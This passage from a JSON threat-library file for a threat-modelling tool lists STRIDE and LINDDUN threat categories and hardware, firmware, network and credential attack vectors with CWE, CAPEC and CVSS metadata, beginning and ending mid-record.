Disaster","Description":"","threatCategorieIDs":["21a0d68d-6bc3-4d4b-8ccb-98b70adc07a6","d9a0d5d5-0c36-45df-9815-ae89ec254677"]},{"ID":"0f772ed4-0e03-4ddc-8e4d-200422c299c3","Name":"STRIDE","Description":"","threatCategorieIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","f0e814f3-b3d2-4357-b155-8fffd70ec42e","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},{"ID":"8bd271b7-2f94-4d3d-baae-d59d2b1fa78c","Name":"LINDDUN","Description":"","threatCategorieIDs":["55379fba-d815-4e29-bd4b-9aa674ed6821","5278c995-f9d9-410e-b012-2995ba30c353","700f5437-7d03-4bff-a0e6-50cfb82dc0e5","b98738a0-f79e-4b1e-86df-0e716eb61bc0","da86b5fc-d15d-41f7-a98f-01fe5e143651","aead4d1d-0f64-42b4-a512-cbbc979af3ca","2521b219-3d43-4fd8-bf96-d658eea44d01"]},{"ID":"dd59986c-693d-43ae-8c4f-2b2bb76a60ec","Name":"Safety & Privacy","Description":"","threatCategorieIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1","7bbfe5d3-8a91-4210-99ab-79f670715e61"]}],"threatCategories":[{"ID":"6de4f75a-bc96-4f32-b18f-867eac0e8fda","Name":"Misuse of computing power","Description":"Starting DDoS attacks; Sending spam mails; Mining of crypto currencies","ImpactCats":[12,13,14,15]},{"ID":"9e715340-1a69-47df-864a-7c3b5a9a678e","Name":"Misuse of electrical power","Description":"Charging the phone; Rewiring to other equipment","ImpactCats":[12,13,14,15]},{"ID":"c46b7c74-5979-409d-8ceb-631b8833c596","Name":"Obtaining of access/control","Description":"","ImpactCats":[4]},{"ID":"c8a14b27-b13f-4358-9f3f-691d01c97c77","Name":"Obtaining of higher priviliges","Description":"","ImpactCats":[4]},{"ID":"b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a","Name":"Keeping access/control","Description":"","ImpactCats":[4]},{"ID":"2dcb00d0-d8a3-4dbc-9efa-d33783a8106b","Name":"Abuse of personal data","Description":"","ImpactCats":[10,13,8,1]},{"ID":"f19e41bd-9fd9-4046-a195-28d441207fa0","Name":"Code/Data tampering/poisoning","Description":"Manipulating the system in order to make it work (slightly) different","ImpactCats":[2]},{"ID":"b869918c-0b47-45c3-8fab-0b698043aa66","Name":"Denial of service","Description":"Putting the system in a state in which it can\'t fulfill it\'s service (e.g., setting invalid configurations, flooding with network requests)","ImpactCats":[3,9,14,15]},{"ID":"6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","Name":"Information disclosure/leaking","Description":"Extracting (secret) information to unauthorized users","ImpactCats":[1,10]},{"ID":"4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","Name":"Privilege abuse","Description":"Reading data/logs to monitor other users; Using insider knowledge for personal gain (e.g., stock trading)","ImpactCats":[1,10,4]},{"ID":"c17cbe5c-3210-42fc-be1e-05f1f915865b","Name":"Repudiation of actions","Description":"Denying performed actions or usage of the system","ImpactCats":[6]},{"ID":"ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d","Name":"Hardware IP theft","Description":"","ImpactCats":[12]},{"ID":"70d07015-4eda-4d1a-8d07-1791f881f8f0","Name":"Software IP theft","Description":"","ImpactCats":[12]},{"ID":"2e50cdf4-cc94-4a32-98ee-825028a1f476","Name":"Process IP theft","Description":"","ImpactCats":[12]},{"ID":"88d19822-b1b0-469f-ae00-1bc600ccaa1d","Name":"Hardware destruction","Description":"","ImpactCats":[3,9,12,14,15]},{"ID":"644f8521-6b49-41bc-86df-4064b89fb881","Name":"Software destruction","Description":"","ImpactCats":[2,3,12,14,15]},{"ID":"96bdc11d-dbb0-4785-8a5c-373e2c492eb0","Name":"Data destruction","Description":"","ImpactCats":[2,3,12,14,15]},{"ID":"3915215b-3414-4b2e-8446-9763398790ec","Name":"Environmental damage","Description":"","ImpactCats":[13]},{"ID":"a6a57921-7fcb-4f54-b0f5-bac0a0f74163","Name":"Financial loss","Description":"","ImpactCats":[12]},{"ID":"bc4b439c-6197-48d3-a308-7fd323d2ea5e","Name":"Human harm","Description":"","ImpactCats":[9]},{"ID":"6b8c08cb-3f02-413a-96b4-179bb1f67997","Name":"Property loss/theft","Description":"","ImpactCats":[12]},{"ID":"4d0bb854-2843-4d47-8b2c-043f7b8e4b4f","Name":"Reputational damage","Description":"","ImpactCats":[13]},{"ID":"08d8fbba-5de4-4538-8674-43e214c3ebad","Name":"Waste of resources","Description":"","ImpactCats":[12]},{"ID":"8a3d81d9-3317-4e5d-88fe-a0e0592295fe","Name":"Traffic sniffing","Description":"","ImpactCats":[1]},{"ID":"d0bcd70c-fbad-4a16-a606-8b0682ae7afe","Name":"Identity and data spoofing","Description":"","ImpactCats":[5,2]},{"ID":"61d04f2d-83b1-4152-9aba-4ad188eef06d","Name":"Surveillance","Description":"","ImpactCats":[1,10]},{"ID":"f7639a0c-e85b-4947-bbec-2ac4a0911827","Name":"Traffic data tampering","Description":"","ImpactCats":[2]},{"ID":"3bdf3019-02dd-4c7f-bffc-90189b39e6a7","Name":"Breach of service-level agreement","Description":"","ImpactCats":[11]},{"ID":"180a9034-735c-44ca-a96a-693cb48ffaa7","Name":"Breach of legislation","Description":"","ImpactCats":[11]},{"ID":"1180824d-9f8a-4a4a-8398-3775c541a360","Name":"Loss of compliance","Description":"","ImpactCats":[11]},{"ID":"647ed950-8b8a-4a3f-b3f0-d9967c7d218f","Name":"Unauthorized use of copyright material","Description":"","ImpactCats":[11]},{"ID":"f2ba26f4-b2da-49a8-aba2-14e42a746d6a","Name":"Application malfunction","Description":"","ImpactCats":[2,9,15]},{"ID":"0285f001-a384-42de-ae6d-6bfbc488c92c","Name":"AI application malfunction","Description":"","ImpactCats":[2,9,15]},{"ID":"f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","Name":"Communication malfunction","Description":"","ImpactCats":[2,3,9,15]},{"ID":"b7935cfe-6a41-45e4-8778-f0fbb1e4018b","Name":"Process malfunction","Description":"","ImpactCats":[2,3,9,15]},{"ID":"5f7607f8-e67d-40f2-a902-33c6cfe298c3","Name":"Hardware failure","Description":"","ImpactCats":[2,3,9,15]},{"ID":"3fb90b77-a990-4d5b-bb8a-fce5e36d8f71","Name":"Software failure","Description":"","ImpactCats":[2,3,9,15]},{"ID":"f2b91aaf-7d9f-4baf-8713-13d7625174d9","Name":"Communication outage","Description":"","ImpactCats":[3,15]},{"ID":"bafd3162-d833-4bf4-beb8-ce95239cb4b4","Name":"Infrastructure outage","Description":"","ImpactCats":[3,15]},{"ID":"2c064bb4-aa49-4e20-ad72-333748a5e497","Name":"Loss of support services","Description":"","ImpactCats":[3,15]},{"ID":"7cf3480c-f4db-47cb-be36-b27deb746c64","Name":"Power outage","Description":"","ImpactCats":[3,15]},{"ID":"21a0d68d-6bc3-4d4b-8ccb-98b70adc07a6","Name":"Environmental conditions","Description":"ToDo: Corrosion, Frostiness, Heat/Fire, Mechanical stress, Over-voltage, Low-voltage, Water, Moisture, Pollution","ImpactCats":[3,15]},{"ID":"d9a0d5d5-0c36-45df-9815-ae89ec254677","Name":"Natural disasters","Description":"","ImpactCats":[3,15]},{"ID":"bcd08af5-29bf-4ed8-ab6c-e311e88f4c84","Name":"Identification","Description":"Identification denotes the threat of associating a (persistent) identifier, e.g. a name and address or a pseudonym of any kind, with an individual and data about him.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"d6eafa9e-6d9d-42aa-a734-0eb11f25607b","Name":"Inventory attacks","Description":"Inventory attacks refer to the unauthorized collection of information about the existence and characteristics of personal things.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"11a5c06f-875c-43fa-a01f-79f4819f98dd","Name":"Lifecycle transitions","Description":"Privacy is threatened when smart things disclose private information during changes of control spheres in their lifecycle.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"787846f0-3f3c-4807-a99d-881383591051","Name":"Linkage","Description":"This threat consists in linking different previously separated systems such that the combination of data sources reveals (truthful or erroneous) information that the subject did not disclose to the previously isolated sources and, most importantly, also did not want to reveal.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"2765e61e-29a9-498e-adf8-4d653f488e3d","Name":"Localization and tracking","Description":"Localization and tracking is the threat of determining and recording a person\u2019s location through time and space.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"af3ee78e-9e83-4bd1-b9b5-13ec28765518","Name":"Privacy-violating interaction and presentation","Description":"This threat refers to conveying private information through a public medium and in the process disclosing it to an unwanted audience. It can be loosely sketched as shoulder- surfing but in real-world environments.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"e6ba8518-0074-492c-95e5-ebe89fa601fe","Name":"Profiling","Description":"Profiling denotes the threat of compiling information dossiers about individuals in order to infer interests by correlation with other profiles and data.\\n-- Ziegeldorf et. al, Privacy in the Internet of Things: Threats and Challenges","ImpactCats":[10]},{"ID":"3bbe354c-317a-4f76-bdbb-75543b5d5aa4","Name":"Spoofing","Description":"","ImpactCats":[5]},{"ID":"f0e814f3-b3d2-4357-b155-8fffd70ec42e","Name":"Tampering","Description":"","ImpactCats":[2]},{"ID":"a77f314c-f74e-4340-a993-5a1a24f26db4","Name":"Repudiation","Description":"","ImpactCats":[6]},{"ID":"369640cc-1b53-4a2e-9e3b-a74c187e68e7","Name":"Information disclosure","Description":"","ImpactCats":[1]},{"ID":"422b9042-212d-4467-a000-2528a2e09f8b","Name":"Denial of Service","Description":"","ImpactCats":[3]},{"ID":"8687e614-c127-418b-8fda-536bb2f0708f","Name":"Elevation of Privileges","Description":"","ImpactCats":[4]},{"ID":"c0bd6e2f-9784-4c11-9aee-115a966e0a4d","Name":"Execution of unauthorized code","Description":"","ImpactCats":[1,2,3,4,5,6,9,10]},{"ID":"55379fba-d815-4e29-bd4b-9aa674ed6821","Name":"Linkability","Description":"An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved.","ImpactCats":[10]},{"ID":"5278c995-f9d9-410e-b012-2995ba30c353","Name":"Identifiability","Description":"An adversary is able to identify a data subject from a set of data subjects through an item of interest. \u200b","ImpactCats":[10]},{"ID":"700f5437-7d03-4bff-a0e6-50cfb82dc0e5","Name":"Non-Repudiation","Description":"The data subject is unable to deny a claim (e.g., having performed an action, or sent a request).","ImpactCats":[10]},{"ID":"b98738a0-f79e-4b1e-86df-0e716eb61bc0","Name":"Detectability","Description":"An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself.","ImpactCats":[10]},{"ID":"da86b5fc-d15d-41f7-a98f-01fe5e143651","Name":"Disclosure of Information","Description":"An adversary is able to learn the content of an item of interest about a data subject.","ImpactCats":[10,1]},{"ID":"aead4d1d-0f64-42b4-a512-cbbc979af3ca","Name":"Unawareness","Description":"The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject\u2019s personal data.","ImpactCats":[10]},{"ID":"2521b219-3d43-4fd8-bf96-d658eea44d01","Name":"Non-Compliance","Description":"The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy.","ImpactCats":[10]},{"ID":"17a04fbd-365f-4345-97f8-88d3c7382ec1","Name":"Safety","Description":"Threats threatening the safety of operation, humans, and machines","ImpactCats":[9]},{"ID":"7bbfe5d3-8a91-4210-99ab-79f670715e61","Name":"Privacy","Description":"Threats threatening the privacy","ImpactCats":[10]}],"attackVectorGroups":[{"ID":"e17870ae-2c37-435c-a284-8df90ff7a5f0","Name":"Threat Library","Description":"","attackVectorGroupIDs":["037c0934-3db3-4320-a580-3581ec92f627","4e160ff0-f1c9-4d2b-a470-6b23ab9c8868","bee6117a-63ee-41b5-b77a-dd2b2b25cec8","a1ddc171-0321-4131-ae58-25b39006320a","e112d000-a2e3-40c0-acdc-1b7856ad99e0","fa6a378a-0e74-43b0-960b-b37576081160","29a5994a-1de4-46e2-94c4-3b9832fff28e","e98488d0-f4ac-49ad-8648-d32ae9563225","1a63ed36-ee55-4773-89d5-8cd466f34cad","98dacc1a-f9e4-46b0-84c2-8718d9301cbb"],"attackVectorIDs":[]},{"ID":"037c0934-3db3-4320-a580-3581ec92f627","Name":"Cryptography Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["0ffd675d-d83c-4f74-8835-398e7f3930cb","31f89637-4b8a-41e9-acac-9d012767a424","97b5a1d4-be82-4485-82f6-e4532795a20b","a20d6e53-4426-4700-a04f-a4018bc7bfce","680ceebd-357c-49d6-8bfd-390dc6c51dde","a0729a41-bcc9-43d8-9c86-bfb26c64e93c","04d5f07e-2482-451b-9e24-94cb650da53b"]},{"ID":"4e160ff0-f1c9-4d2b-a470-6b23ab9c8868","Name":"Network Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["e58fcbde-e429-4704-9f22-c00d187994bc","8f9a24d4-e962-4136-b0ec-8e9f797a6f62","23c3a785-a539-4570-aee0-42bdffb43983","0b47795b-b42d-49d1-bf50-7f4889994fea","bb7358c1-e5b6-424f-962d-daab17345b63","001ba17c-0400-4369-912e-0ceda3ccd227","1447713d-9ad6-454e-81d8-c9f4ef34c72b","f5949698-47d4-48ee-a116-2d212695c41f","b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","c7787e71-5c70-462c-9558-ce20e7cfdfe8","4e007b60-94e7-4df3-b3bd-109eb8627da2"]},{"ID":"bee6117a-63ee-41b5-b77a-dd2b2b25cec8","Name":"Chip-Level Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["b703d3d9-1f29-480a-b7ad-b11716727a91","8a6476b9-7a5c-4306-bd43-db6fe32bbf66","1a99fb9b-d1f0-4215-93a6-5cd9fd272026","9e85cf25-febb-46ca-a5f5-c6283412a87b","c097b67f-1179-4f30-924c-3a4e54c04d9d","d4292863-c64e-4123-806f-71590ec76ed3","e6c3d6f5-f4c7-48b7-b516-2092c3557c81"]},{"ID":"a1ddc171-0321-4131-ae58-25b39006320a","Name":"PCB-Level Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["f6ddb913-05ab-485a-a736-46a3f7466f85","5605adab-044a-4b1f-9344-90a602d8d448","e851a284-6b41-41c9-9efd-dc8b01f788da","be14adbc-19a7-48c8-8f13-2566559e63e2","915f674e-926b-4bd9-94cb-ee8b4637bc80","184cd5e5-2517-4d7f-a81a-c411942d3601"]},{"ID":"53298967-848a-4d3f-8577-a54d76942a8e","Name":"Sub Group","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":[]},{"ID":"c3c1c9ff-637f-4964-8de5-994de73927f8","Name":"Sub Sub Group","Description":"","attackVectorGroupIDs":["dbbb888b-1a29-4ba4-8245-9af87316f4f9"],"attackVectorIDs":[]},{"ID":"dbbb888b-1a29-4ba4-8245-9af87316f4f9","Name":"Sub Sub Sub Group","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":[]},{"ID":"e112d000-a2e3-40c0-acdc-1b7856ad99e0","Name":"Firmware Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["99864969-3b71-45ad-bae5-09bc4ecc5cc1","24645edb-85ac-438b-9033-ba2721c3e2c7","5656f112-8443-4245-aa38-38cd9d9375e0","f0a8edb7-d65f-423f-a391-120d1eb04e02","01a37617-b7ac-446a-86fa-e70c957d154c","97c0d7a1-13c7-43d5-b03c-75845f973af5","ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","c23a62c8-901a-412b-80b8-d2574103b733","83d23b79-71c5-488e-adb2-dd0f76d70f44","f170308a-c188-4ae0-bcef-d04af1e429b3","eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0"]},{"ID":"fa6a378a-0e74-43b0-960b-b37576081160","Name":"Application Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["7dc1eb8e-2312-4b2f-becf-f9725d45cdce","d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","1a511f9e-5d1b-47b9-9071-4d39407cc75c","9538abd8-f79c-4097-b2dd-716e50a125ee","573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","a76b8768-9d68-4074-b5e1-0f9abc61bcda","cf63f187-4353-4bf8-bc37-a7392c6d91bf","66c5f951-6286-4b22-a71a-ee4d6232f689","06c24920-2ce3-49ca-8134-9fa81fb2cdef","71f761e4-8149-4a88-92fd-35f9d99cc0ef","6bf04ffa-1f83-4637-a866-d02ff10d752b","e36eff83-1863-4026-bffe-966a9a104331","6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ed84da5f-3181-4be1-bef4-d911077b1910","b26fc3e4-7a38-4f00-acdb-ec78246d0b25","3162421f-ca5b-400d-bbe8-58a510be9abf","b48781b2-24a2-481b-b7c1-3390dbeeb973","e060675a-41d0-4c4d-9e16-311bb4adec7b"]},{"ID":"29a5994a-1de4-46e2-94c4-3b9832fff28e","Name":"Supply Chain Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["327a2f35-8cf5-46d5-a973-a174f6f7be23","90a4e8f3-c750-47c4-97fd-fa9e25b9b599","21c6b5ef-82c7-41e5-bb07-de93445b2156","a912b48a-3b4d-44ab-b8f3-28000ca945c4"]},{"ID":"e98488d0-f4ac-49ad-8648-d32ae9563225","Name":"Ecosystem Weaknesses","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["30cf5142-2339-4130-8a6e-2b05869e6df2","afd4bceb-31b0-41cd-9eae-02d2eba6b41c","7742f998-ab1e-4f64-8ac6-12b3f97b936a"]},{"ID":"1a63ed36-ee55-4773-89d5-8cd466f34cad","Name":"User Behavior","Description":"","attackVectorGroupIDs":["abf604c4-90f4-41fe-9084-dd2c655d12e8"],"attackVectorIDs":["195d942e-02f8-49ad-873f-299f4b4ad4ec","ffd6083b-7183-472c-b250-15b0de223735"]},{"ID":"98dacc1a-f9e4-46b0-84c2-8718d9301cbb","Name":"Credential Attacks","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["f0ef09ed-0cde-4b12-beb6-f1640132f3e6","0e3c0e3e-1587-46f8-93ea-e9091dff5958","b9436449-7896-4be6-89f8-a19e1c8d014f","5435aa9a-ad52-470f-8fa5-81a4f926b6a6","723dfb40-4ceb-4232-bda5-73bcb3c76ac0","5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","63dfaefa-c8a8-4725-b6d6-2efff7306639","296e95fe-e06d-4ae3-be84-da98df4a122c","4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","bf289171-82c3-431a-b3f1-28d17e5a6546","2f483201-0209-4320-ba2e-2d692274aab5","05e04798-41ce-4919-a92b-264f7e985de2","0217b20a-5e3a-4244-8dce-819e28050a47","1909127e-50bd-4892-8b1f-1a2123a4fa61"]},{"ID":"abf604c4-90f4-41fe-9084-dd2c655d12e8","Name":"Social Engineering","Description":"","attackVectorGroupIDs":[],"attackVectorIDs":["cf948333-b659-40ff-b93f-d4bdc8c980d1"]}],"attackVectors":[{"ID":"0ffd675d-d83c-4f74-8835-398e7f3930cb","Name":"Insufficient random values","Description":"Use of insufficiently random values","OriginTypes":[1],"ThreatIntroduced":["C","I"],"Weakness":{"CWEID":330},"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"ThreatExploited":["O"],"Severity":2},{"ID":"e58fcbde-e429-4704-9f22-c00d187994bc","Name":"Man-in-the-Middle attack","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["I"],"AttackTechnique":{"CAPECID":94,"CVSS":{"AV":"N","AC":"L","PR":"N","UI":"N","S":"U","C":"H","I":"H","A":"L","Score":9.4,"Notes":{}}},"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"ThreatExploited":["O"],"Severity":4},{"ID":"f6ddb913-05ab-485a-a736-46a3f7466f85","Name":"Reverse engineering/Cloning","Description":"Extracting the PCB design to understand or clone the product; e.g., by CAD file theft or modern reverse engineering techniques","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":[],"AttackTechnique":{"CVSS":{"AV":"P","AC":"L","PR":"N","UI":"N","S":"","C":"H","I":"L","A":"N","Score":5.2}},"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"ThreatExploited":["I","P","O"],"Severity":2},{"ID":"b703d3d9-1f29-480a-b7ad-b11716727a91","Name":"Hardware trojan","Description":"Malicious design modification / insertion of a hardware Trojan","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["C","I","P"],"Adversaries":"Untrusted foundry, untrusted IP vendor, untrusted CAD tool, untrusted design facilities","threatCategorieIDs":[],"ThreatExploited":["O"],"AttackTechnique":{"CAPECID":539,"CVSS":{}},"Severity":3},{"ID":"99864969-3b71-45ad-bae5-09bc4ecc5cc1","Name":"Firmware not updatable","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1277},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":4},{"ID":"31f89637-4b8a-41e9-acac-9d012767a424","Name":"Risky crypto implementation","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1240},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"],"ThreatExploited":["O"],"Severity":3},{"ID":"8a6476b9-7a5c-4306-bd43-db6fe32bbf66","Name":"Improper debug access control","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1191},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"1a99fb9b-d1f0-4215-93a6-5cd9fd272026","Name":"Internal asset exposure","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1244},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"9e85cf25-febb-46ca-a5f5-c6283412a87b","Name":"Improper restriction to hardware features","Description":"","OriginTypes":[1],"Weakness":{"CWEID":1256},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":2},{"ID":"24645edb-85ac-438b-9033-ba2721c3e2c7","Name":"Overlap between protected memory ranges","Description":"","OriginTypes":[1],"Weakness":{},"ThreatIntroduced":["I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"5656f112-8443-4245-aa38-38cd9d9375e0","Name":"Sensitive information uncleared","Description":"Sensitive information in memory (SRAM) must be cleared when the system performs a power or debug state transition. For example, SRAMs keep their data after a software reset.","OriginTypes":[1],"Weakness":{"CWEID":1272},"ThreatIntroduced":["I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"f0a8edb7-d65f-423f-a391-120d1eb04e02","Name":"Boot code protection","Description":"Manipulation of boot code in volatile memory to bypass secure boot.","OriginTypes":[1],"Weakness":{"CWEID":1274},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"ThreatExploited":["O"],"Severity":3},{"ID":"c097b67f-1179-4f30-924c-3a4e54c04d9d","Name":"Physical side channel attacks","Description":"Physical side channels expose sensitive information due to patterns in physically observable phenomena such as variations in power consumption, electromagnetic emissions, or acoustic emissions.","OriginTypes":[1],"Weakness":{"CWEID":1300},"ThreatIntroduced":["C","I"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"ThreatExploited":["O"],"Severity":2},{"ID":"5605adab-044a-4b1f-9344-90a602d8d448","Name":"Firmware dumping","Description":"Extracting the firmware via physical interfaces","OriginTypes":[1],"Weakness":{"CWEID":1324},"ThreatIntroduced":["P"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"],"Severity":3},{"ID":"01a37617-b7ac-446a-86fa-e70c957d154c","Name":"Firmware overwrite","Description":"Overwriting the firmware via a physical interface","OriginTypes":[1],"Weakness":{},"ThreatIntroduced":["I","P"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"Severity":4},{"ID":"d4292863-c64e-4123-806f-71590ec76ed3","Name":"Improper isolation of shared resoruces","Description":"For example, a specific memory range is only accessible with higher privileges. However, the memory is mapped to another range with unrestricted access. See CWE for more examples.","OriginTypes":[1],"Weakness":{"CWEID":1189},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":2},{"ID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","Name":"Flooding","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"],"AttackTechnique":{"CAPECID":125,"CVSS":{"AV":"N","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"H","Score":8.2}},"Severity":2},{"ID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","Name":"Log manipulation","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["C","I"],"ThreatExploited":["O","M"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"AttackTechnique":{"CAPECID":93,"CVSS":{"AV":"L","AC":"L","PR":"","UI":"N","S":"U","C":"L","I":"L","A":"N","Score":5.1}},"Severity":2},{"ID":"327a2f35-8cf5-46d5-a973-a174f6f7be23","Name":"Data from decommissioned device","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":1266},"ThreatIntroduced":["C","I"],"ThreatExploited":["E"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":675,"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"N","S":"U","C":"H","I":"N","A":"N","Score":6.2}},"Severity":3},{"ID":"7dc1eb8e-2312-4b2f-becf-f9725d45cdce","Name":"Personally identifiable info exposure","Description":"","OriginTypes":[1],"Weakness":{"CWEID":359},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{}},"Severity":4},{"ID":"23c3a785-a539-4570-aee0-42bdffb43983","Name":"Radio jamming","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"],"AttackTechnique":{"CAPECID":601,"CVSS":{"AV":"A","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"H","Score":7.1}},"Severity":3},{"ID":"0b47795b-b42d-49d1-bf50-7f4889994fea","Name":"Improper certificate validation","Description":"Missing or incorrect certificate validation, e.g. improper validation of chain of trust, expiration, revocation, etc. ","OriginTypes":[1],"Weakness":{"CWEID":295},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":3},{"ID":"d92ccd9c-3a24-4e07-a2ca-c1e9949bb386","Name":"Improper input 